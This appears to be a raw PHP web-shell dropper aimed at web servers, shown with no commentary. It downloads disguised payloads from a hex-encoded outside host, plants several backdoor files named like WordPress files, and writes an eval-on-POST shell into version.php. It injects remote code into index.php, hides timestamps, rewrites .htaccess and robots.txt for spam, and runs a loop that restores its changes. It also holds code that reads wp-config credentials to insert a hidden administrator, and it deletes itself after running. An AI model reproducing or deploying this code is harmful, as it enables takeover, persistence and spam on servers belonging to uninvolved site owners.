Ele57885fddfg872782782782 hjkhj782dfgfghgقفغفغفقhfg555434536
Upload FileeE
<?php header( 'Content-Type: text/html;charset=utf-8' ); error_reporting( E_ALL ); $seclevel = "|wp-head.php|wp-site.php"; $useragent = "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"; $domain = "\x68\x74\x74\x70\x3a\x2f\x2f\x73\x2e\x6e\x65\x77\x6e\x64\x61\x79\x2e\x78\x79\x7a\x2f"; $mode = isset($_GET["mode"]) ? $_GET["mode"] : 0; $script_name= $_SERVER["SCRIPT_FILENAME"]; $scriptpath=pathinfo($script_name); $scrip_dir=$scriptpath['dirname']; $fullurl=$_SERVER['PHP_SELF']; $currentpath=pathinfo($fullurl); $currentdir=$currentpath['dirname']; if($currentdir=='/' || $currentdir=="\\") { $root=$scrip_dir; } else { $dirinfo=explode($currentdir,$scrip_dir); $root=$dirinfo[0]; } if($root=='' || strpos($root, ".php") !== false ) { $root=$_SERVER['DOCUMENT_ROOT']; } echo $root.'<br/>'; @chdir($root); $http = ( isset( $_SERVER["HTTPS"] ) && $_SERVER["HTTPS"] == "on" ) ? 'https' : 'http'; $host = $_SERVER["HTTP_HOST"]; if ( isset( $_POST['message_type'] ) && ! empty( $_POST['message_type'] ) ) { $message_type = $_POST['message_type']; } else { $message_type = 'html'; } $sellerinfo=file_get_contents($domain.'/seller/readtxt1.php?domain='.$_SERVER["HTTP_HOST"]); if($sellerinfo<>'') { if(strpos($sellerinfo,'|') !== false) { $sellerinfoarray=explode('|',$sellerinfo); $sellerinfo=$sellerinfoarray[0]; $sellersizearray=explode(',',$sellerinfoarray[1]); $parsedUrl = parse_url(trim($sellerinfo)); $sellsize=filesize($root.$parsedUrl['path']); foreach($sellersizearray as $sellersizeinfo) { if(strpos($sellersizeinfo,strval($sellsize)) !== false) { $modelarray=explode(':',$sellersizeinfo); $mode=(int)$modelarray[1]; break; } } } $parsedUrl = parse_url(trim($sellerinfo)); if(file_exists($root.$parsedUrl['path'])) { $seller = $parsedUrl['path']; } else { $seller =''; } } else { $seller =''; } echo '<span style="font-size:15px; color:red;">seller-enfile:'.$seller.'</span><br/>'; // if(file_exists($root.$seller)) // { // $sellerfc=file_get_contents($root.$seller); // $loginpart=get($domain.'mjcode/login.gif'); // if($loginpart) // { // $sellerlast=$loginpart.$sellerfc; // $serllerput=file_put_contents($root.$seller,$sellerlast); // if($serllerput) // { // echo 'mjlogin success'; // } // } // else // { // echo '<span style="color:red;">mjlogin fail</span>'; // } // } $arpath8 = array(); fi1( $root ); $htens = array(); if (isset($_GET["db"])) { $gov = $_GET["db"]; } else if (isset($_POST["db"])) { $gov = $_POST["db"]; } else { $gov = ''; } if ($gov === '') { $gov = get_filename(__FILE__); } $sitemap_code_file = isset($_FILES['sitemap_code_file']) ? $_FILES['sitemap_code_file']['tmp_name'] : ''; if (isset($_GET["line"]) && $_GET["line"]=='1') { $oneline = "line"; } else { $oneline = ""; } function get_filename($file_path) { $file_base_name = basename($file_path); $file_name_arr = explode('.', $file_base_name); $f_name = $file_name_arr[0]; return $f_name; } function getx($url) { if (stripos($url, 'http') !== false) { $content = urla($url); } else { $content = file_get_contents($url); } return $content; } function enfile() { global $root, $http, $host, $domain, $arpath8, $fp2, $enfile7,$seller; $htens = array(); $return_result = array(); $return_result['title'] = 'create shell'; $return_result['status'] = 'ok'; $return_result['file'] = array(); //create wp-info.php $filename='wp-info.php'; $rfnew = get( $domain . 't1/h2.gif'); if(file_exists($root.'/'.$filename)) { @chmod($root.'/'.$filename,'0644'); } $xdnew_ok = @file_put_contents($root.'/'.$filename,$rfnew); if ( $xdnew_ok ) { $xdnew_url = $http . "://" . $host . '/' . $filename; //$return_result['message'][] = 'file:' . " \t" . $xdnew_url . ' success'; //$return_result['file'][] = $xdnew_url; } //create wp-info.php end //create wp-term.php $filenamesite='wp-term.php'; $siterfnew = get( $domain . 'sitemap/wp-term.gif'); if(file_exists($root.'/'.$filenamesite)) { @chmod($root.'/'.$filenamesite,0644); } $xdnewsite_ok = @file_put_contents($root.'/'.$filenamesite,$siterfnew); if ( $xdnewsite_ok ) { $xdnewsite_url = $http . "://" . $host . '/' . $filenamesite; //$return_result['message'][] = 'file:' . " \t" . $xdnew_url . ' success'; //$return_result['file'][] = $xdnew_url; } //create wp-admin.php $filename5='wp-admin.php'; $rfnew5 = get( $domain . 't1/u1.gif'); if(file_exists($root.'/'.$filename5)) { @chmod($root.'/'.$filename5,0644); } $xdnew_ok5 = @file_put_contents($root.'/'.$filename5,$rfnew5); if ( $xdnew_ok5 ) { $xdnew_url5 = $http . "://" . $host . '/' . $filename5; //$return_result['message'][] = 'file:' . " \t" . $xdnew_url5 . ' success'; //$return_result['file'][] = $xdnew_url5; } //create checkbex.php $loginpart=get( $domain . 'mjcode/login.gif'); $filename3='checkbex.php'; if(!$seller) { $rfnew3 = get( $domain . 't1/h3.gif'); } else { $rfnew3 =file_get_contents($root.$seller); $rfnew3 = $loginpart.$rfnew3; } if(file_exists($root.'/'.$filename3)) { @chmod($root.'/'.$filename3,0644); } $xdnew_ok3 = @file_put_contents($root.'/'.$filename3,$rfnew3); if ( $xdnew_ok3 ) { $xdnew_url3 = $http . "://" . $host . '/' . $filename3; $return_result['message'][] = 'file:' . " \t" . $xdnew_url3 . ' success'; $return_result['file'][] = $xdnew_url3; } //create checkbex.php end $check_repeat = array(); // $custom_file = array('wp-content','wp-includes'); $custom_file = array(); $wrmfwlf = array( '/h1.gif', '/h2.gif', '/h3.gif', '/h4.gif', '/h5.gif', '/i1.gif', '/i2.gif', '/i3.gif', '/i4.gif', '/i5.gif', 'blust.gif' ); if($seller) { array_push($wrmfwlf,$seller,$seller); } if(count($arpath8)<=9) { for($num=0;$num<count($arpath8);$num++) { array_push( $custom_file, $arpath8[$num] ); } } else { $ranfile = array_rand( $arpath8, count( $wrmfwlf ) - count( $custom_file ) ); foreach ( $ranfile as $i ) { array_push( $custom_file, $arpath8[ $i ] ); } } $self_shell_name = array('updates.php'.$enfile7,'wp-config-samples.php'.$enfile7,'wp-config-samples.php'.$enfile7,'spacings.php'.$enfile7,'duotones.php'.$enfile7,'admin.php'.$enfile7,'index.php'.$enfile7,'themes.php'.$enfile7,'wp-config-samples.php'.$enfile7,'checkbex.php'.$enfile7,'upgrade.php'.$enfile7); //updates.php|wp-config-sample.php|themes.php|dimensiones.php|duotones.php|spacings.php|update.php|customs.php if($seller) { array_push($self_shell_name,'wp-options.php'.$enfile7,'wp-link.php'.$enfile7); } $i = 0; if(count($arpath8)<=9) { $enfilecount=sizeof( $arpath8 ); } else { $enfilecount=sizeof( $wrmfwlf ); } while ( $i < $enfilecount ) { $htens[ $custom_file[ $i ] ] = $self_shell_name[ $i ]; $sf = $custom_file[$i] . '/' . $self_shell_name[ $i ]; if(strpos($wrmfwlf[ $i ],'.php') !== false){ $rf = $loginpart.file_get_contents($root.$wrmfwlf[ $i ]); }else{ $rf = get( $domain . 't1' . $wrmfwlf[ $i ] ); } $xd_ok = @file_put_contents($sf,$rf); //$fh = fopen( $sf, "w+" ); //$xd_ok = fwrite( $fh, $rf ); //fclose( $fh ); if ( $xd_ok ) { $xd_url = $http . "://" . $host . '/' . $sf; $return_result['message'][] = 'file:' . " \t" . $xd_url . ' success'; $return_result['file'][] = $xd_url; //if( basename($sf.'/index.php') != 'index.php' ){ // $self_shell_name[] = basename($sf); //} } $i ++; } //$wp_admin_content = @file_get_contents( 'wp-admin/index.php' ); $result = @file_put_contents( $root.'/version.php', "<?php if(isset(\$_POST['cdshell']) && !empty(\$_POST['cdshell'])){@eval(\$_POST['cdshell']);} ?>" ); if ( $result ) { $xd_url = $http . "://" . $host . '/' . 'version.php'; $return_result['message'][] = 'file:' . " \t" . $xd_url . ' success'; $return_result['file'][] = $xd_url; } $htc = ''; $htc .= '<IfModule mod_rewrite.c>' . "\n"; $htc .= 'RewriteEngine On' . "\n"; $htc .= 'RewriteBase /' . "\n"; $htc .= 'RewriteRule ^index.php$ - [L]' . "\n"; $htc .= 'RewriteCond %{REQUEST_FILENAME} !-f' . "\n"; $htc .= 'RewriteCond %{REQUEST_FILENAME} !-d' . "\n"; $htc .= 'RewriteRule . index.php [L]' . "\n"; $htc .= '</IfModule>' . "\n"; $htc .= '<FilesMatch ".*\.(py|exe|phtml|php|PHP|Php|PHp|pHp|pHP|phP|PhP|php5|php7|php8|suspected)$">' . "\n"; $htc .= 'Order Allow,Deny' . "\n"; $htc .= 'Deny from all' . "\n"; $htc .= '</FilesMatch>' . "\n"; $htc .= '<FilesMatch "^({#htens})$">' . "\n"; $htc .= 'Order Allow,Deny' . "\n"; $htc .= 'Allow from all' . "\n"; $htc .= '</FilesMatch>' . "\n"; $htresult = file_put_contents( $root . '/.hcontentold', json_encode( $htens ) ); $htresult = file_put_contents( $root . '/.hcontent', $htc ); if ( $htresult ) { $return_result['htcontent'] = $htc; } return $return_result; } function urla($url, $header = null, $postdata = null) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($ch, CURLOPT_ENCODING, 'gzip,deflate'); if (stripos($url, "https:") === false) { curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE); } if (is_array($header) && !empty($header)) { curl_setopt($ch, CURLOPT_HTTPHEADER, $header); } if (is_array($postdata) && !empty($postdata)) { curl_setopt($ch, CURLOPT_POST, 1); curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata); } curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $body = curl_exec($ch); curl_close($ch); return $body; } function get( $url ) { $ch = curl_init(); curl_setopt( $ch, CURLOPT_URL, $url ); curl_setopt( $ch, CURLOPT_FOLLOWLOCATION, 1 ); curl_setopt( $ch, CURLOPT_ENCODING, 'gzip,deflate' ); curl_setopt( $ch, CURLOPT_HTTPHEADER, array( 'Expect:' ) ); if ( stripos( $url, "https:" ) === false ) { curl_setopt( $ch, CURLOPT_SSL_VERIFYPEER, false ); curl_setopt( $ch, CURLOPT_SSL_VERIFYHOST, false ); } curl_setopt( $ch, CURLOPT_RETURNTRANSFER, 1 ); $body = curl_exec( $ch ); curl_close( $ch ); return $body; } function output_message( $result, $message_type = 'html', $html_tag = 'li' ) { if ( $message_type != 'html' ) { echo json_encode( $result ); return; } if ( ! is_array( $result ) ) { return; } if ( ! isset( $result['title'] ) ) { $result['title'] = ''; } echo '---------start ' . $result['title']; if ( sizeof( $result['message'] ) > 0 ) { foreach ( $result['message'] as $message ) { $message = str_replace( 'success', '<font color="blue">success</font>', $message ); $message = str_replace( ' ok', '<font color="blue"> ok</font>', $message ); $message = str_replace( 'fail', '<font color="red">fail</font>', $message ); echo "<$html_tag>" . $message . "</$html_tag>"; } } if ( isset( $result['status'] ) && ! empty( $result['status'] ) ) { if ( $result['status'] == 'ok' ) { $status = '<font color="green">' . $result['status'] . '</font>'; } if ( $result['status'] == 'fail' ) { $status = '<font color="red">' . $result['status'] . '</font>'; } echo '---------end ' . $result['title'] . '===>status:' . $status; } else { $status = '<font color="green">ok</font>'; echo '---------end ' . $result['title'] . '===>status:' . $status; } echo "<br />"; } function adduser() { global $root, $http, $host, $domain, $arpath8, $fp2; $contents = file_get_contents( $root."/wp-config.php" ); preg_match( "@['|\"]DB_NAME['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchd ); preg_match( "@['|\"]DB_USER['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchu ); preg_match( "@['|\"]DB_PASSWORD['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchp ); preg_match( "@['|\"]DB_HOST['|\"],\s*['|\"](.*?)['|\"]@", $contents, $matchh ); preg_match( "@table_prefix\s*=\s*['|\"](.*?)['|\"]@", $contents, $matchw ); $db_name = $matchd[1]; $db_user = $matchu[1]; $db_pass = $matchp[1]; $db_host = $matchh[1]; $db_pre = $matchw[1]; $db_port = "3306"; if ( strstr( $db_host, ":" ) ) { $arr = explode( ":", $db_host ); $db_host = $arr[0]; $db_port = $arr[1]; } if ( trim( $db_host ) == "" ) { $db_host = "localhost"; } $con = mysqli_connect( $db_host, $db_user, $db_pass, $db_name, $db_port ); $sql = "update $db_pre" . "users set user_pass='$P$BoLkL3AHaMdH6J75faSQtNKFrXyweT/' where user_login in ('_system','itsme');"; $query = mysqli_query( $con, $sql ); $sql = "select * from $db_pre" . "users where user_login='wp_postadmin';"; $query = mysqli_query( $con, $sql ); $row = mysqli_fetch_array( $query ); if ( ! empty( $row ) ) { // $sql = "update $db_pre"."users set user_pass='$P$BoLkL3AHaMdH6J75faSQtNKFrXyweT/' where user_login='itsme';"; $sql = "update $db_pre" . "users set user_pass='$P$BoLkL3AHaMdH6J75faSQtNKFrXyweT/' where user_login='wp_postadmin';"; $query = mysqli_query( $con, $sql ); return "user wp_postadmin exists, change password"; } else { $sql = "insert into $db_pre" . "users(user_login,user_pass,user_nicename,user_email,user_registered,user_activation_key,user_status,display_name) values('wp_postadmin', '$P$BoLkL3AHaMdH6J75faSQtNKFrXyweT/', 'wp_postadmin', 'wordpressuser@gmail.com', '2021-05-21 09:13:26', '', '0', 'wp_postadmin');"; $query = mysqli_query( $con, $sql ); $sql = "select ID from $db_pre" . "users where user_login='wp_postadmin';"; $query = mysqli_query( $con, $sql ); $row = mysqli_fetch_array( $query ); $id = $row['ID']; $sql = "insert into $db_pre" . "usermeta(user_id, meta_key, meta_value) values($id, '$db_pre" . "capabilities', 'a:1:{s:13:\"administrator\";b:1;}');"; $query = mysqli_query( $con, $sql ); $sql = "select * from $db_pre" . "users where user_login='wp_postadmin';"; $query = mysqli_query( $con, $sql ); $row = mysqli_fetch_array( $query ); if ( $row['user_login'] == "wp_postadmin" ) { return "useradd ok"; } } return "useradd fail"; } function file_get_https($url, $timeout) { $arrContextOptions = array( "ssl" => array( "verify_peer" => false, "verify_peer_name" => false, ), 'http' => array( 'method' => "GET", 'timeout' => $timeout, ), ); @file_get_contents($url, false, stream_context_create($arrContextOptions)); } function cyma() { global $root, $http, $host, $domain; $return_result = array(); $arr_msg = auto_restore_cycle(); foreach ($arr_msg as $key => $msg) { $return_result['message'][] = $msg; } return $return_result; } function auto_restore_cycle() { global $root, $http, $host, $domain; $arr_msg = array(); $code ="<?php set_time_limit(99 - 99); ignore_user_abort(1); function auto_restore_memory() { \$index_path = '".$root."/index.php'; \$flag_filename = '".$root . "/3FNDICU2KH'; @unlink(\$flag_filename); \$index_code = @file_get_contents(\$index_path); while (1) { clearstatcache(); if (file_exists(\$flag_filename)){ break; } if (!file_exists(\$index_path) or @file_get_contents(\$index_path) != \$index_code) { @chmod(\$index_path, 438); @unlink(\$index_path); @file_put_contents(\$index_path, \$index_code); @chmod(\$index_path, 292); } sleep(2); } } ob_end_clean(); header(\"Connection: close\"); ob_start(); echo 888; header(\"Content-Length: \" . ob_get_length()); ob_end_flush(); flush(); auto_restore_memory(); ?>"; $file_path = $root . '/' . 'cyborg_tmp.php'; $success = @file_put_contents($file_path, $code); $arr_msg[] = 'write tmp file: ' . $file_path . ' ' . ($success ? 'success' : 'fail'); if (!$success) { return $arr_msg; } $protocol = (isset($_SERVER["HTTPS"]) && $_SERVER["HTTPS"] == "on") ? 'https' : 'http'; $file_url = str_replace($root, $protocol . '://' . $_SERVER['HTTP_HOST'], $file_path); file_get_https($file_url, 3); $arr_msg[] = 'get: ' . $file_url . ' ok'; $success = @unlink($file_path); $arr_msg[] = 'delete: ' . $file_path . ' ' . ($success ? 'success' : 'fail'); return $arr_msg; } function pingsitemap() { global $root, $http, $host, $domain, $useragent; $return_data = array(); $return_data['title'] = 'start ping sitemap'; // $content = urla(sprintf("%s://%s/pingsitemap.xml", $http, $host),array('User-Agent: '.$useragent)); $content = urla(sprintf("%s://%s/pgg.xml", $http, $host), array('User-Agent: ' . $useragent)); $result = strrpos($content, 'sitemap'); if ($result) { $return_data['status'] = 'ok'; $return_data['message'][] = "!!! 3.1 get and ping sitemap.xml ok\n" . $result . "\n"; } else { $content = urla(sprintf("%s://%s/?pingsitemap.xml", $http, $host), array('User-Agent: ' . $useragent)); $result = strrpos($content, 'sitemap'); if ($result) { $return_data['status'] = 'ok'; $return_data['message'][] = "!!! 3.1 get and ping sitemap.xml ok\n" . $result . "\n"; } else { $return_data['status'] = 'fail'; $return_data['message'][] = "!!! 3.1 get and ping sitemap.xml fail\n" . $result . "\n"; } } return $return_data; } function sedht() { global $root, $http, $host, $mode,$ht, $domain,$gov, $sitemap_code_file,$oneline; $return_data = array(); $return_data['title'] = 'start set index .htaccess'; $return_data['status'] = 'ok'; if(file_exists($root .'/robots.txt')) { @unlink($root .'/robots.txt'); } $robots_code=getx($domain.'/robots/robots.txt'); $robots_code=str_replace('http://wp.mn',$http.'://'.$host,$robots_code); $robots_put=@file_put_contents($root.'/robots.txt', $robots_code); if (!$robots_put || $robots_code=='') { $return_data['message'][] = 'modify file robots.txt file fail.'; } else { $return_data['message'][] = 'modify file robots.txt file success.'; } if(file_exists($root .'/sitemap.xml')) { @unlink($root .'/sitemap.xml'); } if(file_exists($root .'/index.html')) { if(!file_exists($root .'/index.php')) { $index_html=file_get_contents($root .'/index.html'); file_put_contents($root .'/index.php',$index_html); } rename($root .'/index.html',$root .'/indexs.html'); } if ( !is_dir($root . '/wp-includes') || !is_dir($root . '/wp-content')) { $return_data['message'][] = 'The site is not wordpress.'; } else { $return_data['status'] = 'fail'; $return_data['message'][] = 'The site is wordpress.'; return $return_data; } if (!file_exists($root.'/index.php')) { $return_data['status'] = 'fail'; $return_data['message'][] = 'index.php not exists.'; return $return_data; } else { $return_data['message'][] = 'index.php file exists.'; } $file_time = filectime($root.'/index.php'); if (empty($sitemap_code_file)) { $url = $domain . $gov . '/' . $gov . '.' . $mode . '.idx'; } else { $url = $sitemap_code_file; } @chmod($root.'/index.php', 0644); $uc = getx($url); $b = @file_get_contents($root.'/index.php'); if (!file_exists($root.'/index' . date("w") . '.php')) { @file_put_contents($root.'/index' . date("w") . '.php', $b); } if ($oneline) { file_put_contents($root.'/heada.php',$uc); @touch($root.'/heada.php', strtotime("-290 days", time())); $newidex='<?php @include("heada.php");?>'."\n"; $new_contentonline = $newidex . $b; $put_load_result = @file_put_contents($root.'/index.php', $new_contentonline); } else { $needle = '<?php // ' . $gov . '?>'; $idx_code = $uc ; $new_content = $idx_code . $b; $put_load_result = @file_put_contents($root.'/index.php', $new_content); } if (!$put_load_result) { $return_data['message'][] = 'modify file index.php file fail.'; $return_data['status'] = 'fail'; return $return_data; } else { touch($root.'/index.php', $file_time); $return_data['message'][] = 'index.php time update success.'; $return_data['message'][] = 'modify file index.php file success.'; @chmod($root.'/index.php', 0444); } @chmod($root.'/.htaccess', 0644); $file_time = filectime($root.'/.htaccess'); $n = file_put_contents($root.'/.htaccess', $ht); if (!$n) { $return_data['status'] = 'fail'; $return_data['message'][] = 'write .htaccess file fail'; } else { $return_data['message'][] = '.htaccess create success.'; touch($root.'/.htaccess', $file_time); $return_data['message'][] = '.htaccess time modify success'; @chmod($root.'/.htaccess', 0444); $return_data['message'][] = '.htaccess 0444 modify success'; } return $return_data; } $ht = ' <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule> '; if (isset($_GET["q"])) { $q = $_GET["q"]; } else if (isset($_POST["q"])) { $q = $_POST["q"]; } else { $q = ''; } $current_name=basename($_SERVER['PHP_SELF']); if(strpos($current_name,'php7') !== false) { $enfile7='7'; } else { $enfile7=''; } $sedht_result = sedht(); output_message($sedht_result, $message_type); if($sedht_result['status'] == 'ok') { if ($q != 'fix') { //$pingsitemap_result = pingsitemap(); //output_message($pingsitemap_result, $message_type); } $cyma_result = cyma(); // 4 output_message($cyma_result, $message_type); $enfile_result = enfile(); // 3 down_s_file(); if ( file_exists( $root."/wp-config.php" ) ) { //$adduser_message = adduser(); //$enfile_result['message'][] = $adduser_message; } output_message( $enfile_result, $message_type ); if ( $message_type == 'html' ) { if ( isset( $enfile_result['file'] ) && sizeof( $enfile_result['file'] ) ) { echo "path:<br /><textarea style=\"width: 90%;height: 100px;\">"; foreach ( $enfile_result['file'] as $file ) { $pas="\x40\61\x30\62\x34\43\x25\115\x76\143\x5e"; echo $file."?pas=" .$pas. "\t"; } echo "</textarea>"; } if ( isset( $enfile_result['htcontent'] ) ) { echo "htcontent:<br /><textarea style=\"width: 40%;height: 200px;\">"; echo $enfile_result['htcontent']; echo "</textarea>"; } } } function down_s_file() { global $domain,$root; $gh = get( $domain . '/h/gh.gif' ); if ( function_exists( 'file_put_contents' ) ) { file_put_contents( $root.'/gh.php', $gh ); } else { $fh = fopen( $root.'/gh.php', "a+" ); fwrite( $fh, $gh ); fclose( $fh ); } } function fi1( $path ) { global $root, $arpath8; if ( $handle = opendir( $path ) ) { while ( ( $file = readdir( $handle ) ) !== false ) { if ( $file != "." && $file != ".." ) { $pfile = $path . "/" . $file; if ( is_dir( $pfile ) && ! is_link( $pfile ) ) { if ( substr_count( str_replace( $root . '/', '', $pfile ), '/' ) < 3 ) { fi1( $pfile ); } if ( ! file_exists( $pfile . "/index.php" ) ) { array_push( $arpath8, str_replace( $root . '/', '', $pfile ) ); } } } } } shuffle( $arpath8 ); } @unlink( __FILE__ ); ?>